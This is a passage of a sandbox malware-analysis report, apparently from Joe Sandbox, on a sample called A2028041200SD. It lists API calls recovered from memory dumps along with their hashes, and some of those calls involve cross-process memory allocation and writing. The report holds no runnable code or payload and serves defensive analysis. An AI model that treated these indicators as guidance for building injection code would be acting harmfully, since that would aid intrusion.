                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 3741023627-0
                                                                        • Opcode ID: 6080e1981252dbc8c61017a2a7c89cea1bbb3196e1ff4e7aa783e7817a4885fc
                                                                        • Instruction ID: bf707faac23e6bd258f0bef3266304ab1ed0b862030026ad868a295aed74722e
                                                                        • Opcode Fuzzy Hash: 6080e1981252dbc8c61017a2a7c89cea1bbb3196e1ff4e7aa783e7817a4885fc
                                                                        • Instruction Fuzzy Hash: 61018131514724ABEB249B60EE9EB9677B8FF00705F000559B686A14E4DBF4AA84DB80
                                                                        APIs
                                                                        • EndPath.GDI32(?), ref: 0090B0BA
                                                                        • StrokeAndFillPath.GDI32(?,?,0096E680,00000000,?,?,?), ref: 0090B0D6
                                                                        • SelectObject.GDI32(?,00000000), ref: 0090B0E9
                                                                        • DeleteObject.GDI32 ref: 0090B0FC
                                                                        • StrokePath.GDI32(?), ref: 0090B117
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                        • String ID:
                                                                        • API String ID: 2625713937-0
                                                                        • Opcode ID: 2e5b354c69be864f753f7e6bf24448662f5aee548f5c32abc706a994ce1b7b1f
                                                                        • Instruction ID: b40d19981223a1a7c33965f96672111b9377fc02a41ac0b2eaca5b06b13ea96e
                                                                        • Opcode Fuzzy Hash: 2e5b354c69be864f753f7e6bf24448662f5aee548f5c32abc706a994ce1b7b1f
                                                                        • Instruction Fuzzy Hash: F7F0F23202D208EFDB219F69EE187A43B78BB00372F888314E429840F0C73089A6EF50
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 0093F2DA
                                                                        • CoCreateInstance.OLE32(0097DA7C,00000000,00000001,0097D8EC,?), ref: 0093F2F2
                                                                        • CoUninitialize.OLE32 ref: 0093F555
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInitializeInstanceUninitialize
                                                                        • String ID: .lnk
                                                                        • API String ID: 948891078-24824748
                                                                        • Opcode ID: 07b58d0d4ac93496ef709e432ff22a07b161dc638e7a1e2399de13d72bf8f7ea
                                                                        • Instruction ID: 7f91483ba4960837d9db74217d91ea454d2e72151314c6318ac105deb32bf9f0
                                                                        • Opcode Fuzzy Hash: 07b58d0d4ac93496ef709e432ff22a07b161dc638e7a1e2399de13d72bf8f7ea
                                                                        • Instruction Fuzzy Hash: C1A11A71104205AFD300EF68C895EABB7A8FF98714F00495DF695D7192EB70EA49CB92
                                                                        APIs
                                                                          • Part of subcall function 008F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F53B1,?,?,008F61FF,?,00000000,00000001,00000000), ref: 008F662F
                                                                        • CoInitialize.OLE32(00000000), ref: 0093E85D
                                                                        • CoCreateInstance.OLE32(0097DA7C,00000000,00000001,0097D8EC,?), ref: 0093E876
                                                                        • CoUninitialize.OLE32 ref: 0093E893
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                        • String ID: .lnk
                                                                        • API String ID: 2126378814-24824748
                                                                        • Opcode ID: dfa1dcb62465d8d65928108244b72395c891f00e08a23984d3492f2e9a43cb55
                                                                        • Instruction ID: ab94264a70d272a5ec707cb0a3b5aaa59a6d87953f6eaa961eba7e5bd2c41c24
                                                                        • Opcode Fuzzy Hash: dfa1dcb62465d8d65928108244b72395c891f00e08a23984d3492f2e9a43cb55
                                                                        • Instruction Fuzzy Hash: 67A135356043059FCB14DF24C484E6ABBE9FF89314F148998F99A9B3A1CB31ED45CB92
                                                                        APIs
                                                                        • __startOneArgErrorHandling.LIBCMT ref: 009132ED
                                                                          • Part of subcall function 0091E0D0: __87except.LIBCMT ref: 0091E10B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorHandling__87except__start
                                                                        • String ID: pow
                                                                        • API String ID: 2905807303-2276729525
                                                                        • Opcode ID: 895cf245700e89bd6b4b12c2cd1418f698df8e7f16e2811860227f23b894fe97
                                                                        • Instruction ID: 9429f91794b782c4ff42b85f6f678931e6b5c533ea412bdf1006ef6c868e9e95
                                                                        • Opcode Fuzzy Hash: 895cf245700e89bd6b4b12c2cd1418f698df8e7f16e2811860227f23b894fe97
                                                                        • Instruction Fuzzy Hash: E9513931B1C20E96DB15B714C9513FA6BAC9B81710F60CD28F8B5822A9DF398DC5A746
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0098DC50,?,0000000F,0000000C,00000016,0098DC50,?), ref: 00934645
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 009346C5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper$__itow__swprintf
                                                                        • String ID: REMOVE$THIS
                                                                        • API String ID: 3797816924-776492005
                                                                        • Opcode ID: abaf51541422fa3e1654c4c856ad730b2406985badfa549adb3305d7e1dea04a
                                                                        • Instruction ID: 54b9e0eb9482ff3527e50d36b51bc64ab5754556a364514cb617d39b3013d5ad
                                                                        • Opcode Fuzzy Hash: abaf51541422fa3e1654c4c856ad730b2406985badfa549adb3305d7e1dea04a
                                                                        • Instruction Fuzzy Hash: 82415E34A002199FCF00EF68C885ABEB7B5FF49314F158469E916AB392DB34AD45CF51
                                                                        APIs
                                                                          • Part of subcall function 0093430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0092BC08,?,?,00000034,00000800,?,00000034), ref: 00934335
                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0092C1D3
                                                                          • Part of subcall function 009342D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0092BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00934300
                                                                          • Part of subcall function 0093422F: GetWindowThreadProcessId.USER32(?,?), ref: 0093425A
                                                                          • Part of subcall function 0093422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0092BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0093426A
                                                                          • Part of subcall function 0093422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0092BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00934280
                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0092C240
                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0092C28D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                        • String ID: @
                                                                        • API String ID: 4150878124-2766056989
                                                                        • Opcode ID: 4a009c9f4eb8e52e1877f7bf458cab207d0b4d476667e50ca238274e3b20ab48
                                                                        • Instruction ID: 4ad16165dcafa80ce86edfa08a9b46f2cd9c093419aa2f69f52aa31f040bc2a0
                                                                        • Opcode Fuzzy Hash: 4a009c9f4eb8e52e1877f7bf458cab207d0b4d476667e50ca238274e3b20ab48
                                                                        • Instruction Fuzzy Hash: 1B4139B2900218AEDB10EBA4CD81BEEB7B8AF49300F114095FA55B7191DA71AE85CB61
                                                                        APIs
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0098DC00,00000000,?,?,?,?), ref: 0095A6D8
                                                                        • GetWindowLongW.USER32 ref: 0095A6F5
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0095A705
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long
                                                                        • String ID: SysTreeView32
                                                                        • API String ID: 847901565-1698111956
                                                                        • Opcode ID: 0efc8430a601a407051234b4ffdb6f0600dea8dd76c6cc56835d4744b88c36a4
                                                                        • Instruction ID: 5226383295e94deab8f029f90de024d09421e73a0520a78dd2d81995a773edcd
                                                                        • Opcode Fuzzy Hash: 0efc8430a601a407051234b4ffdb6f0600dea8dd76c6cc56835d4744b88c36a4
                                                                        • Instruction Fuzzy Hash: CA31CD3160120AAFDB218E39CC41BEA77A9FF89334F244714F975932E0C731A8549B94
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0095A15E
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0095A172
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 0095A196
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window
                                                                        • String ID: SysMonthCal32
                                                                        • API String ID: 2326795674-1439706946
                                                                        • Opcode ID: 940ab8e9da06d814f1d01d6e86cc77dcc6a8e5cc7bc198ca1237da52e39187f7
                                                                        • Instruction ID: 41e0ac6fb49e0105d0c428b5d2fe70e7289b3f1c9dd1d9140fa4adb1f81f34f0
                                                                        • Opcode Fuzzy Hash: 940ab8e9da06d814f1d01d6e86cc77dcc6a8e5cc7bc198ca1237da52e39187f7
                                                                        • Instruction Fuzzy Hash: 2E21BF32514218ABDF15CF94CC42FEA3B79EF88724F100214FE55AB1D0D6B5AC54DBA4
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0095A941
                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0095A94F
                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0095A956
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$DestroyWindow
                                                                        • String ID: msctls_updown32
                                                                        • API String ID: 4014797782-2298589950
                                                                        • Opcode ID: d887d1d938cc257762b34bf35a7c0be0af774649080be2427b11441960f105f7
                                                                        • Instruction ID: da3080b76854a44ed752fa9d36ff37aa4ca9b9f0081a9490b8ec4648f66272db
                                                                        • Opcode Fuzzy Hash: d887d1d938cc257762b34bf35a7c0be0af774649080be2427b11441960f105f7
                                                                        • Instruction Fuzzy Hash: 8E21B0B5600209AFDB10DF29CC91DB737ADEF8A3A4B040259FA049B261DB31EC159B61
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00959A30
                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00959A40
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00959A65
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$MoveWindow
                                                                        • String ID: Listbox
                                                                        • API String ID: 3315199576-2633736733
                                                                        • Opcode ID: ce928dfca0ca751f26d89e90bf93d50f128a39a26ff6ea855bf4ef983c1a2dfb
                                                                        • Instruction ID: 1b2bfc3bbf6c9a1d7a2ad44134e2fa55f0981ce105b78cb974507ca17d4473fb
                                                                        • Opcode Fuzzy Hash: ce928dfca0ca751f26d89e90bf93d50f128a39a26ff6ea855bf4ef983c1a2dfb
                                                                        • Instruction Fuzzy Hash: EC21D032610118BFEF21CF55CC85FBB3BAEEF89761F018128F9449B190C6719C5597A0
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0095A46D
                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0095A482
                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0095A48F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: msctls_trackbar32
                                                                        • API String ID: 3850602802-1010561917
                                                                        • Opcode ID: 68f891003b574dfc0654822c722a08edb2409428fffb7e60a7f8f85158ea147e
                                                                        • Instruction ID: 6b94b1476014b79e1976f6351d79819837d045c5499f7614162581f389374385
                                                                        • Opcode Fuzzy Hash: 68f891003b574dfc0654822c722a08edb2409428fffb7e60a7f8f85158ea147e
                                                                        • Instruction Fuzzy Hash: 8711E771210208BEEF249FA6CC45FAB376DEFC9764F014218FA45A60E1D7B2E815D724
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00912350,?), ref: 009122A1
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 009122A8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: RoInitialize$combase.dll
                                                                        • API String ID: 2574300362-340411864
                                                                        • Opcode ID: 7192589d6f0a3da0ffea7f4310c21b17ae388f2ec8e5db47434bc4cace6b2c10
                                                                        • Instruction ID: e4adf2a297d9783fbf203323fda910a2903155851e557c4964f00207aa7c38ef
                                                                        • Opcode Fuzzy Hash: 7192589d6f0a3da0ffea7f4310c21b17ae388f2ec8e5db47434bc4cace6b2c10
                                                                        • Instruction Fuzzy Hash: 61E01A716BD300ABDB586F74ED4AB5A3668BF81B16F004520F116E60A0CBB44090EF08
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00912276), ref: 00912376
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0091237D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: RoUninitialize$combase.dll
                                                                        • API String ID: 2574300362-2819208100
                                                                        • Opcode ID: f34472dd76978fac7310059f57ea16d4dd0713fa891863b87f7586a62fc1374b
                                                                        • Instruction ID: 5ef688e2685dd33c6b4b87262cb0c5d6820beb48b10d4b668fde32aea40c5a40
                                                                        • Opcode Fuzzy Hash: f34472dd76978fac7310059f57ea16d4dd0713fa891863b87f7586a62fc1374b
                                                                        • Instruction Fuzzy Hash: 09E0BF7166D3049BDB286F65EE0DB093678BB42715F104518F10DE10B0C7B59451EE54
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: LocalTime__swprintf
                                                                        • String ID: %.3d$WIN_XPe
                                                                        • API String ID: 2070861257-2409531811
                                                                        • Opcode ID: ca4185b4798d628081b3a8d603a8cc17fe6e6e224b2a0e61dac59f79248b6a42
                                                                        • Instruction ID: db15706a6af6cc62f38cef406e8e01f7cca692790cc58938a99c7a3fafdabdf6
                                                                        • Opcode Fuzzy Hash: ca4185b4798d628081b3a8d603a8cc17fe6e6e224b2a0e61dac59f79248b6a42
                                                                        • Instruction Fuzzy Hash: 1AE0127180561CEBCB109790CD45DF973BCAB44741F140892B946B1144D63D9BC4AE12
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,008F42EC,?,008F42AA,?), ref: 008F4304
                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008F4316
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                        • API String ID: 2574300362-1355242751
                                                                        • Opcode ID: 93e533a243dd45afcd7a0141f42a361557762f088d47408d284639dfc5ffa2c7
                                                                        • Instruction ID: 19e832c9b80de9c778f48d18bca44b7c67c870ed9188b716cb4855980c8b54a6
                                                                        • Opcode Fuzzy Hash: 93e533a243dd45afcd7a0141f42a361557762f088d47408d284639dfc5ffa2c7
                                                                        • Instruction Fuzzy Hash: C1D0A7318187129FC7244F75E80CA1377E4FF85315F10841AE946D2260E7B0C8C0C750
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,009521FB,?,009523EF), ref: 00952213
                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00952225
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
